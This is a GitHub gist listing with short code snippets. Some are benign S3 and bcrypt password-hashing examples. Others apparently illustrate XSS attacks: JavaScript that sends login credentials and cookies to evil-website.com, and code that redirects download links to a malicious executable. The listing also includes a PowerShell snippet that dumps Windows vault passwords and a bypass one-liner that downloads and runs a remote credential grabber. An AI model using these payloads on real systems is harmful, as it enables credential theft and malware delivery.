Kyle Mistele K-Mistele
🏴☠️
K-Mistele
/ upload_example.py
Created
December 22, 2020 22:28
An example of uploading and downloading files with the Bucket API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import s3_bucket as S3 | |
| import os | |
| # get your key data from environment variables | |
| AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
| AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
| # initialize the package | |
| S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |
K-Mistele
/ blob_example.py
Created
December 22, 2020 22:29
Example of storing large blobs of data with the Bucket API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import s3_bucket as S3 | |
| import os | |
| # get your key data from environment variables | |
| AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') | |
| AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') | |
| # initialize the package | |
| S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def login(username, password): | |
| user = Users.get(username) # fetch the user record from the database | |
| # if no user matches the username, don't log them in | |
| if not user: | |
| return False | |
| # hash the supplied password | |
| supplied_hash = some_hash_function(password) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import bcrypt | |
| # this will create the hash that you need to store in your database | |
| def create_bcrypt_hash(password): | |
| # convert the string to bytes | |
| password_bytes = password.encode() | |
| # generate a salt | |
| salt = bcrypt.gensalt(14) | |
| # calculate a hash as bytes | |
| password_hash_bytes = bcrypt.hashpw(password_bytes, salt) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const username = document.getElementById('username_input'); | |
| const username_box = document.getElementById('username_box'); | |
| user_name_box.innerHTML = username; |
K-Mistele
/ login_page_example.js
Created
January 15, 2021 21:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // add an event listener to the form | |
| const form_element = document.getElementsByTagName('form')[0]; | |
| form_element.addEventListener('submit', () => { | |
| // capture the username and password from the form | |
| const username = document.getElementById('username_input').value; | |
| const password = document.getElementById('password_input').value; | |
| // send the username and password to the attacker | |
| fetch(`https://evil-website.com/password-capture/?u=${username}&p=${password}`); |
K-Mistele
/ forum_example.js
Created
January 15, 2021 21:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // capture the cookies | |
| const cookie = document.cookie; | |
| // send the cookies to the attacker | |
| fetch('https://evil-website.com/cookie-capture', { | |
| data: cookie | |
| }); |
K-Mistele
/ download_page_example.js
Created
January 15, 2021 21:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // grab all download links on the page | |
| const download_links = document.getElementsByClassName('download-link'); | |
| // change their target to a malicious piece of software hosted on the attacker's server | |
| for (let link of download_links) { | |
| link.setAttribute('href', 'https://evil-website.com/evil-program.exe'); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] | |
| $vault = New-Object Windows.Security.Credentials.PasswordVault | |
| $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password |
K-Mistele
/ oneliner.ps1
Created
June 23, 2021 21:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HanseSecure/credgrap_ie_edge/master/credgrap_ie_edge.ps1')" |